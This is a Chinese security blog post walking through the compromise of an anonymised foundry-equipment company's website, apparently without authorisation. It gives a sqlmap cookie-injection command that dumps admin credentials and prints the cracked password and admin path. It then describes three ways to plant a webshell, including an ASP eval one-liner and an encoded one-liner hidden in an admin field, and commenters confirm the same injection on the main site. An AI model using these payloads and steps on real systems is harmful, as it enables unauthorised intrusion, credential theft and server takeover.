DYBOY's Blog

[渗透实战]某铸造设备公司官网经典思路

这个网站是微信漏洞挖掘公开课群里的一位群友发出来的,空闲时看了看,不是很难,但是我觉得有一定的参考价值,算是比较经典的一种吧!

*声明:只做技术分享,后续已去除shell的文件!请相关公司做好及时的修复!看到这篇文章的大佬,也别去折腾了,思路本文已经分享,自重

微信群友发来这样的消息:

[图片已删除]

从这样的消息看出来,已经知道 editor 编辑器,可以确定发问者已经进入网站的后台了,所以这样的网站应该比较好拿下。

得知这个问题后,就分享到团队内部,大家有空的就可以看看,练练手。


0x01 SQL注入:

当我们访问主站的时候,随便加上参数,发现存在防止SQL注入的程序存在,影响了我们的注入。

当我们浏览器选择移动终端的模拟情况下,访问会跳转到手机的一个域名 m.xxxx.com ,这样的网站就是一个手机域名的,但是是一个和PC公用一个后台的网站程序。

移动端

对于子站的防护一般不强,选择了手机网站程序入手,加上' 发现还是会被程序拦截,想到 asp 程序的接受参数用的 request 语句,可以接受 postgetcookie的参数,因此,我们尝试 cookie注入

这里简单测试发现存在注入,可以写脚本的方式测试,但是为了简单,直接使用 Sqlmap 神器

存在注入

SQL injection

再来这样一句:

python sqlmap/sqlmap.py -u "http://m.xxxx.com/ProductShow.asp" --cookie "id=325" --batch --dbs --level 2 -T admin -C "id,username,password" --first 1 --dump

Got important information

得到管理员账号:admin

解密得到管理员密码:admin6830


0x02 进入后台:

后台地址:域名/manage/login.asp

登录后台

进去后浏览器选择 兼容模式


0x03 获取Shell:

有三种方式,不详细展示:

1.编辑器其实是 kindeditor ,这个编辑器除了一个XSS漏洞就没什么了,这里选择上传一张带有小马的照片,然后在备份文件中,备份这个文件为 一个 a.asp 的格式备份文件,但会显示备份文件 xxxx/a.asp.asa 成功,其实并没有asa的文件后缀,所以直接连接你的小马就行了。

2.网站配置文件是写配置文件的形式,保存的文件为./Inc/config.asp,保存配置文件的小马推荐一个:

"%><%Y=request("x")%><%eval(Y)%><%'

3.在管理员管理处,添加管理员处,添加编码后的一句话:

┼攠數畣整爠煥敵瑳∨≡┩愾
密码:a

然后备份文件,只需要修改备份后的文件后缀为 asp,也会遇上 asp.asa 的回显,去掉 .asa 即可菜刀连接


0x04 总结:

Getshell

经典的东西,分享之~

版权声明:《 [渗透实战]某铸造设备公司官网经典思路 》为DYBOY原创文章未经允许不得转载。

 DYBOY
 作者签名:安全从业者,爱好安全产品开发,渗透测试,Web漏洞研究

发表评论:

用心评论~

帅人已评:

heartS
2018-07-17 19:36
其实主站内也有sql注入,,同样可以通过cookie注入进行攻击,,在搜索框处
DYBOY
2018-07-20 16:18
@heartS:对的,因为是同一套程序,对于cookie参数并没有过滤导致的
旧事酒浓
2018-07-17 08:41
没什么亮点 没什么技术含量 少发这种没水平的帖子 浪费个人时间 也浪费你的时间
DYBOY
2018-07-17 09:00
@旧事酒浓:博客只是记录并分享思路,希望对更多人有启发,博主也是觉得分享一些有价值的东西,就本篇文章,如题所述经典的思路,现在几乎遇不到这样的网站,相信这位大佬您也是知道的,不是所有的人都像你一样是大佬,所以希望理解一下!
TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap